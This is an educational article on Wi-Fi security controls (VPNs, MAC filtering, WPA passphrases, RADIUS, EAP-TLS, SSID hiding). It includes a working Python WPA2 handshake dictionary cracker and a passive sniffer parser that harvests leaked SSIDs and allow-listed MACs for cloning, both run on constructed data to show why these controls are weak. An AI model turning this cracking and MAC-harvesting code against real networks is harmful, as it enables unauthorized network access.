IT professionals can reduce risk to the company by using the tools the access point manufacturer provides and taking the basic steps of turning on Wi-Fi security and changing the access point's defaults. Adding further security options and enabling add-ons produces a much stronger security regime for the WLAN. The measures described below are enhancements you can layer onto a WLAN to reduce the risk of unwanted access or of transmitted data being read by outsiders.

Most experts recommend a VPN or similar technology whenever sensitive data must traverse unsecured links or media. These added protocol layers and encryption services protect traffic between a sender and a receiver while it is in transit across public or otherwise untrusted network links, such as the internet.

For example, IPsec provides mechanisms for establishing encrypted security associations between pairs of devices. IPsec is commonly used to tunnel encrypted traffic between a VPN client that needs remote access and a VPN gateway at the edge of the corporate network. You can also use IPsec to set up private end-to-end communication between pairs of computers inside the corporate network. In either case, IPsec relies on Internet Key Exchange (IKE) to authenticate both parties, negotiate the security properties of the association and derive shared session keys across inherently unsecured links; IKE uses a Diffie-Hellman exchange so the session keys themselves are never transmitted, and it can authenticate the peers with certificates or with a pre-shared key. If you authenticate IKE with a pre-shared key, treat it with the same care as a WPA passphrase: a weak key can be guessed, and a key shared by all remote users cannot be revoked for just one of them.

VPNs based on IPsec can therefore provide a layer of security above and beyond whatever Wi-Fi controls are in place. Many early corporate wireless networks used VPNs to compensate for the weaknesses of WEP, gaining individual user authentication and more robust encryption. Today, corporate wireless networks still use VPNs when encryption is required over the air and when sensitive data is relayed across an unsecured link, such as a branch office connection, and VPNs are most frequently combined with wireless technology to protect remote users connecting over Wi-Fi from public hotspots and home networks. Two caveats apply. A VPN protects only the traffic that enters the tunnel, so a client configured for split tunneling still exposes everything it sends outside the tunnel to the hotspot. And a VPN does nothing against attacks on the client at the link layer, such as association with a rogue access point, in the interval before the tunnel is up; an always-on VPN that blocks other traffic until the tunnel is established closes most of that window.

802.1X gives you effective access control for wireless devices that support WPA/WPA2. Access by simpler devices that do not support WPA/WPA2 is often controlled by MAC address filtering instead. With this mechanism, the access point holds a list of registered MAC addresses and permits only those addresses to communicate with it. MAC addresses are burned into network interfaces during manufacturing and are designed to be unique. Although this sounds foolproof, it is not: the MAC address travels in the clear in the header of every frame, so anyone who monitors the wireless channel for a while learns which addresses are permitted, and ordinary software lets an interface imitate any address it likes. MAC filtering therefore keeps out accidental or casual connections, not a determined attacker, and it provides no encryption at all.

Tip: MAC address filtering is most effective when it is used in conjunction with the other approaches described in this section, never as the only control.

Various wireless implementations use longer keys for WEP, WPA and other wireless protocols. For example, standard WEP keys are 40 bits long, while many access points support WEP keys marketed as 128 or even 256 bits (the 128-bit variant is actually a 104-bit key plus a 24-bit initialization vector). All else being equal, a longer key takes longer to guess by brute force. WEP, however, is not broken by brute force: its flaws lie in how RC4 is keyed and how initialization vectors are reused, so a 104-bit WEP key can be recovered from captured traffic in minutes regardless of its length. Key length does not rescue WEP; only replacing it with WPA2 does.

This is one reason TKIP encrypts data with temporal keys that are mixed per packet and renewed periodically. Some mechanism is still required for sender and receiver to end up with the same master key from which the temporal keys are derived. With WPA-Personal (and WPA2-Personal) the pre-shared key (PSK) is that master key: the access point and the client each derive it from the passphrase and the network's SSID using PBKDF2 with 4,096 iterations. Because the derivation is public and the SSID is visible, anyone who captures a single client's four-way handshake can test passphrase guesses offline at leisure, which is why the passphrase must be long and random rather than merely hard to guess from knowledge of its owner. With WPA-Enterprise, a fresh master key is produced by the authentication exchange with the RADIUS server and delivered via 802.1X for every session, so there is no passphrase to attack.

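To make the passphrase point concrete, here is an added example in Python (not code from the original page) that derives the WPA2-Personal master key from a passphrase and SSID, expands it into the per-session unicast keys, and runs a dictionary attack against a constructed four-way handshake. The access point and station addresses, the nonces and the EAPOL-Key frame are constructed in the code rather than captured; the frame layout and the RSN information element follow IEEE 802.11, and the passphrase/SSID pair "password"/"IEEE" is the test vector published with 802.11i. The same key expansion applies to WPA-Enterprise, with the RADIUS-supplied master key in place of the passphrase-derived one.

```python
"""WPA2-Personal key hierarchy and an offline dictionary check against a
constructed four-way handshake. Added example; not code from the original page.
MACs, nonces and the EAPOL frame are constructed; layouts follow IEEE 802.11."""
import hashlib
import hmac
import time

# Passphrase-to-PSK test vector published in IEEE 802.11i (passphrase "password", SSID "IEEE").
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
MIC_OFFSET = 81  # offset of the 16-byte MIC field inside an EAPOL-Key frame
# RSN information element advertising CCMP with PSK authentication.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase, ssid):
    """PSK (= PMK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so a default SSID lets attackers precompute tables."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-384 'Pairwise key expansion': PTK = KCK(16) | KEK(16) | TK(16) for CCMP.
    In WPA-Enterprise the same expansion runs on the PMK the RADIUS server supplies."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3))
    return b"".join(blocks)[:48]


def eapol_msg2(snonce, rsn_ie):
    """EAPOL-Key message 2 (station -> AP) with the MIC field zeroed."""
    body = bytes([2])                        # key descriptor type: RSN
    body += (0x010A).to_bytes(2, "big")      # key info: HMAC-SHA1 MIC, pairwise, MIC present
    body += (16).to_bytes(2, "big")          # key length (CCMP temporal key)
    body += (1).to_bytes(8, "big")           # replay counter
    body += snonce                           # key nonce
    body += bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in message 2)
    body += bytes(16)                        # MIC placeholder
    body += len(rsn_ie).to_bytes(2, "big") + rsn_ie
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type EAPOL-Key


def eapol_mic(kck, frame):
    """MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC zeroed), key descriptor v2."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid):
    """Simulate AP and station to produce message 2 as a sniffer would capture it.
    Addresses and nonces are fixed constructed values so the result is reproducible."""
    hs = {"ssid": ssid,
          "aa": bytes.fromhex("0200000000aa"),    # AP (authenticator) address, constructed
          "spa": bytes.fromhex("02000000005a"),   # station (supplicant) address, constructed
          "anonce": bytes(range(32)),
          "snonce": bytes(range(32, 64))}
    frame = eapol_msg2(hs["snonce"], RSN_IE)
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    hs["msg2"] = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return hs


def verify_candidate(hs, passphrase):
    """True if the candidate reproduces the MIC on message 2; that is all an attacker needs."""
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["msg2"]), hs["msg2"][MIC_OFFSET:MIC_OFFSET + 16])


def recover_passphrase(hs, wordlist):
    """Offline dictionary attack: the cost per guess is one PBKDF2 run (8192 HMAC-SHA1)."""
    for candidate in wordlist:
        if verify_candidate(hs, candidate):
            return candidate
    return None


def years_to_exhaust(charset_size, length, guesses_per_second):
    """Worst-case time to try every passphrase of the given length and alphabet."""
    return charset_size ** length / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    hs = make_handshake("password", "IEEE")
    words = ["letmein", "Password1", "wifi1234", "password"]
    t0 = time.perf_counter()
    print("recovered passphrase:", recover_passphrase(hs, words))
    rate = len(words) / (time.perf_counter() - t0)
    print(f"~{rate:.0f} guesses/s in pure Python on one core")
    for n in (8, 12, 20):
        print(f"random {n}-char [A-Za-z0-9] passphrase: "
              f"{years_to_exhaust(62, n, rate * 1e4):.1e} years at 1e4x that rate")
```

Dedicated cracking tools implement exactly this loop on GPUs at hundreds of thousands of guesses per second, so a passphrase taken from a wordlist or a short pattern falls quickly, while a random passphrase of 20 or more characters stays out of reach because PBKDF2 has to be recomputed for every guess. Because the SSID is the salt, a default or common network name additionally lets an attacker use precomputed tables; give the network a unique SSID as well as a long passphrase.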
RADIUS is designed to provide reliable, centralized authentication for all kinds of remote network access, including wireless access. Environments that use RADIUS can rely on strong authentication from the RADIUS server (typically an EAP method such as PEAP or EAP-TLS backed by a user directory) and on the key material the server hands to the access point at the end of a successful exchange. RADIUS, working in conjunction with 802.1X, supplies the per-session key distribution and management that Wi-Fi by itself lacks. A RADIUS server is generally required to support 802.1X and must be maintained by someone who understands the protocols and security parameters. In particular, the master key travels from the RADIUS server to the access point protected only by the RADIUS shared secret, so that secret must be long and unique to each access point, and the RADIUS traffic belongs on a management network or inside TLS (RadSec) where the equipment supports it.

Note: You'll see how to set up WPA security with a RADIUS server in the Do it section.

Kerberos is a standard set of internet protocols, services and identity proofs that are part and parcel of authentication in many networking environments. Rather than publishing public keys, Kerberos relies on a trusted key distribution center (KDC) that shares a secret key with every user and service. The KDC issues time-limited tickets with which a client proves its identity to a service, and both sides obtain a fresh session key in the process, so Kerberos provides strong mutual authentication and keying material that can be used alongside wireless networking. Kerberos is the default authentication method for domain logons in Windows XP, Windows Vista and Windows Server 2003.

SSL, and its successor TLS, is a session protocol that provides confidentiality, integrity and certificate-based authentication for internet sessions between an application and a server; WTLS is the variant defined for WAP handsets. On wireless networks TLS does this work inside EAP (EAP-TLS, PEAP, EAP-TTLS): the client opens a TLS session with the authentication server through the access point, the server proves its identity with a certificate (and with EAP-TLS the client does too), the user's credentials travel only inside the protected session, and keying material from the TLS handshake becomes the master key for the Wi-Fi session before any network access or exchange of real data is allowed. The check that makes this safe is certificate validation on the client: configure supplicants with the CA certificate and the expected server name, because a client that accepts any certificate will hand its credentials to a rogue access point running its own RADIUS server.

Multiple keys are in play with WPA (TKIP) and WPA2 (AES-CCMP). Data exchanged with each client is encrypted with a unicast (pairwise) key unique to that client. A group key shared by every station is also needed, because broadcast and multicast traffic for local network services such as Dynamic Host Configuration Protocol (DHCP) and Address Resolution Protocol (ARP) must be readable by all of them. With WPA/WPA2 the pairwise key is derived and the group key delivered during the four-way handshake when a client associates, before it can send any data. A fresh pairwise key is derived for every association (in WPA-Enterprise from a master key that 802.1X supplies anew each session), but the group key necessarily stays the same across all clients for some period of time.

Any station that has held the group key can read all broadcast and multicast traffic and forge such frames for as long as that key remains in use, including a device that has since left the network or been deauthorized. To limit that exposure, access points support dynamically generated, short-lived group keys: with a rekey interval configured, the access point generates a new group key periodically and whenever a station disassociates, and distributes it to the remaining stations in a group key handshake. Short group key lifetimes shrink the window a departed or compromised station has; they only affect broadcast and multicast traffic (such as DHCP and ARP) and offer no improvement for unicast data, which already gets its own key per session.

SSID hiding, a technique developed by Lucent and available in most access points, stops the access point from broadcasting its SSID in beacon frames, so it does not advertise its name at all. This defeats simple scanning tools, which otherwise list every wireless network within range with ease, and discourages so-called war driving, where outsiders cruise neighborhoods looking for wireless networks to use for free. It is a weak control, however: the SSID is still carried in the clear in probe responses, association requests and other frames exchanged whenever an authorized user connects, and even slightly more sophisticated tools overhear it. Hiding the SSID also makes every client probe for the network by name wherever it goes, so your laptops and phones announce it in airports and cafes as well.

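As an added example (not code from the original page), the following Python parses a handful of constructed 802.11 frames the way a passive sniffer would and shows what both of the weak controls above leak: the beacon carries an empty SSID, but the probe request, probe response and association request that follow carry the name, and the data frame headers carry the station addresses that the MAC filter admits. Frame layouts follow IEEE 802.11; the addresses, SSID, allow-list and frames are constructed for the example.

```python
"""What a passive listener learns from a network that hides its SSID and
filters by MAC address. Added example; not code from the original page.
Frame layouts follow IEEE 802.11; addresses, SSID and frames are constructed."""
import struct

BROADCAST = b"\xff" * 6
TYPE_MGMT, TYPE_DATA = 0, 2
SUB_ASSOC_REQ, SUB_PROBE_REQ, SUB_PROBE_RESP, SUB_BEACON = 0, 4, 5, 8
FLAG_TO_DS, FLAG_FROM_DS = 0x01, 0x02

# Constructed network: one AP, two stations, a MAC filter that admits only STA_A.
AP = bytes.fromhex("0200000000aa")
STA_A = bytes.fromhex("02000000000a")
STA_B = bytes.fromhex("02000000000b")
SSID = "CorpWiFi"
ALLOWED_MACS = {STA_A.hex(":")}


def mgmt_frame(subtype, da, sa, bssid, body):
    """Management frame: FC, duration, addr1=DA, addr2=SA, addr3=BSSID, seq, body."""
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0])
    return fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def data_frame(sa, bssid, da, to_ds):
    """Data frame header only; the encrypted payload is irrelevant to address harvesting."""
    if to_ds:   # station -> AP: addr1=BSSID, addr2=SA, addr3=DA
        addrs, flags = bssid + sa + da, FLAG_TO_DS
    else:       # AP -> station: addr1=DA, addr2=BSSID, addr3=SA
        addrs, flags = da + bssid + sa, FLAG_FROM_DS
    return bytes([TYPE_DATA << 2, flags]) + b"\x00\x00" + addrs + b"\x00\x00"


def ssid_ie(ssid):
    """Information element 0; a hidden network sends it with length 0."""
    return bytes([0, len(ssid)]) + ssid.encode()


def parse_ies(data):
    """Split a run of type-length-value information elements into {id: value}."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        eid, ln = data[i], data[i + 1]
        ies[eid] = data[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def harvest(frames):
    """Passive view of the channel: BSSIDs hiding their SSID, SSID names that
    leak anyway, and station MACs seen exchanging data with the AP."""
    out = {"hidden_bssids": set(), "ssids": set(), "stations": set()}
    for f in frames:
        ftype, subtype, flags = (f[0] >> 2) & 3, f[0] >> 4, f[1]
        a1, a2, a3 = f[4:10], f[10:16], f[16:22]
        if ftype == TYPE_MGMT:
            if subtype in (SUB_BEACON, SUB_PROBE_RESP):
                ies = parse_ies(f[36:])   # skip timestamp(8), interval(2), capability(2)
            elif subtype == SUB_ASSOC_REQ:
                ies = parse_ies(f[28:])   # skip capability(2), listen interval(2)
            elif subtype == SUB_PROBE_REQ:
                ies = parse_ies(f[24:])
            else:
                continue
            ssid = ies.get(0, b"")
            if subtype == SUB_BEACON and ssid == b"":
                out["hidden_bssids"].add(a3.hex(":"))
            elif ssid:
                out["ssids"].add(ssid.decode(errors="replace"))
        elif ftype == TYPE_DATA:
            station = a2 if flags & FLAG_TO_DS else a1   # sender or receiver, whichever is the station
            if station != BROADCAST:
                out["stations"].add(station.hex(":"))
    return out


def filter_bypass_candidates(allowed, harvested):
    """Allow-listed addresses an eavesdropper can clone with an ordinary MAC change."""
    return allowed & harvested


def sample_capture():
    """Constructed frames in the order a client joins a hidden network."""
    fixed = bytes(8) + struct.pack("<HH", 100, 0x0431)   # timestamp, beacon interval, capability
    return [
        mgmt_frame(SUB_BEACON, BROADCAST, AP, AP, fixed + ssid_ie("")),          # beacon: SSID hidden
        mgmt_frame(SUB_PROBE_REQ, BROADCAST, STA_A, BROADCAST, ssid_ie(SSID)),   # client asks by name
        mgmt_frame(SUB_PROBE_RESP, STA_A, AP, AP, fixed + ssid_ie(SSID)),        # AP answers with the name
        mgmt_frame(SUB_ASSOC_REQ, AP, STA_A, AP, struct.pack("<HH", 0x0431, 10) + ssid_ie(SSID)),
        data_frame(STA_A, AP, AP, to_ds=True),
        data_frame(AP, AP, STA_A, to_ds=False),
        data_frame(STA_B, AP, AP, to_ds=True),
    ]


if __name__ == "__main__":
    seen = harvest(sample_capture())
    print("BSSIDs hiding their SSID:", seen["hidden_bssids"])
    print("SSIDs leaked by other frames:", seen["ssids"])
    print("station MACs seen on the air:", seen["stations"])
    print("allow-listed MACs an attacker can clone:",
          filter_bypass_candidates(ALLOWED_MACS, seen["stations"]))
```

Everything the script extracts comes from unencrypted frame headers and management frames, which is why neither control costs an attacker more than a few minutes of listening. Once a permitted address is known, cloning it is a one-line interface setting on any operating system.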
Through combinations of these approaches you can strengthen wireless security appreciably and mitigate the potential vulnerabilities or exposures that Wi-Fi would otherwise present; none of them on its own is a substitute for WPA2 with a strong passphrase or 802.1X.

Practical Wi-Fi security